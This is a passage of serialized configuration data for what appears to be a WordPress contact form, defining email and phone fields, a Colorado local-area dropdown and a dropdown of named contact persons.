Name\";s:9:\"field_key\";s:11:\"lastname_95\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:56;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_96\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_96\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:57;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"phone_97\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_97\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:58;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_98\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_98\";}s:2:\"id\";i:59;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:5:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:21:\"Initiator-Lisa Boston\";s:5:\"value\";s:21:\"Initiator-Lisa Boston\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"ESA/Initiator-Tom Boston\";s:5:\"value\";s:24:\"ESA/Initiator-Tom Boston\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"4\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:28:\"ESA/Initiator-Becky Crandell\";s:5:\"value\";s:28:\"esa-initiator-becky-crandell\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"ESA/Initiator-Roy Ludwick\";s:5:\"value\";s:25:\"ESA/Initiator-Roy Ludwick\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 